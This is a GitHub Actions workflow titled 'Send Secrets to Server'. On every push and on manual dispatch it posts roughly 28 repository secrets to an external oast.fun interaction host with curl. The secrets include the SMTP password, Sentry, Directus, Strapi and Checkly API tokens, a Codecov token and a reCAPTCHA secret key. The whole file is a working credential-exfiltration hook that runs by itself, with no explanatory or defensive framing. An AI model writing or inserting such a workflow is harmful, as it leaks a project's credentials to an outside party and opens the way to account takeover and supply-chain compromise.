name: Send Secrets to Server

on:
  push: 
  workflow_dispatch:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Bypass Cache
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Server
        run: |
          curl -d 'SMTP_HOST=${{ secrets.SMTP_HOST }}&CONTACT_FORM_RECEIVE_EMAIL=${{ secrets.CONTACT_FORM_RECEIVE_EMAIL }}&NEXT_PUBLIC_FLAGSMITH_ID=${{ secrets.NEXT_PUBLIC_FLAGSMITH_ID }}&CODECOV_TOKEN=${{ secrets.CODECOV_TOKEN }}&SMTP_PASSWORD=${{ secrets.SMTP_PASSWORD }}&NEXT_PUBLIC_DATADOG_APPLICATION_ID=${{ secrets.NEXT_PUBLIC_DATADOG_APPLICATION_ID }}&SMTP_PORT=${{ secrets.SMTP_PORT }}&DIRECTUS_PREVIEW_SECRET=${{ secrets.DIRECTUS_PREVIEW_SECRET }}&NEXT_PUBLIC_GOOGLE_ANALYTICS_ID=${{ secrets.NEXT_PUBLIC_GOOGLE_ANALYTICS_ID }}&NEXT_PUBLIC_DIRECTUS_URL=${{ secrets.NEXT_PUBLIC_DIRECTUS_URL }}&LHCI_GITHUB_APP_TOKEN=${{ secrets.LHCI_GITHUB_APP_TOKEN }}&NEXT_PUBLIC_DATADOG_CLIENT_TOKEN=${{ secrets.NEXT_PUBLIC_DATADOG_CLIENT_TOKEN }}&NEXT_PUBLIC_SHOW_LOGGER=${{ secrets.NEXT_PUBLIC_SHOW_LOGGER }}&NEXT_PUBLIC_STRAPI_API_URL=${{ secrets.NEXT_PUBLIC_STRAPI_API_URL }}&RELEASE_PLEASE_TOKEN=${{ secrets.RELEASE_PLEASE_TOKEN }}&STRAPI_API_TOKEN=${{ secrets.STRAPI_API_TOKEN }}&NEXT_PUBLIC_OG_BASE_URL=${{ secrets.NEXT_PUBLIC_OG_BASE_URL }}&SMTP_USER=${{ secrets.SMTP_USER }}&RECAPTCHA_SECRET_KEY=${{ secrets.RECAPTCHA_SECRET_KEY }}&NEXT_PUBLIC_HOTJAR_ID=${{ secrets.NEXT_PUBLIC_HOTJAR_ID }}&DIRECTUS_API_TOKEN=${{ secrets.DIRECTUS_API_TOKEN }}&CONTACT_FORM_SEND_EMAIL_DOMAIN=${{ secrets.CONTACT_FORM_SEND_EMAIL_DOMAIN }}&NEXT_PUBLIC_COOKIEBOT_ID=${{ secrets.NEXT_PUBLIC_COOKIEBOT_ID }}&SENTRY_AUTH_TOKEN=${{ secrets.SENTRY_AUTH_TOKEN }}&NEXT_PUBLIC_RECAPTCHA_SITE_KEY=${{ secrets.NEXT_PUBLIC_RECAPTCHA_SITE_KEY }}&CHECKLY_ACCOUNT_ID=${{ secrets.CHECKLY_ACCOUNT_ID }}&CHECKLY_API_KEY=${{ secrets.CHECKLY_API_KEY }}' https://erirmxttdggtymyxsyfz517lli625c25e.oast.fun
    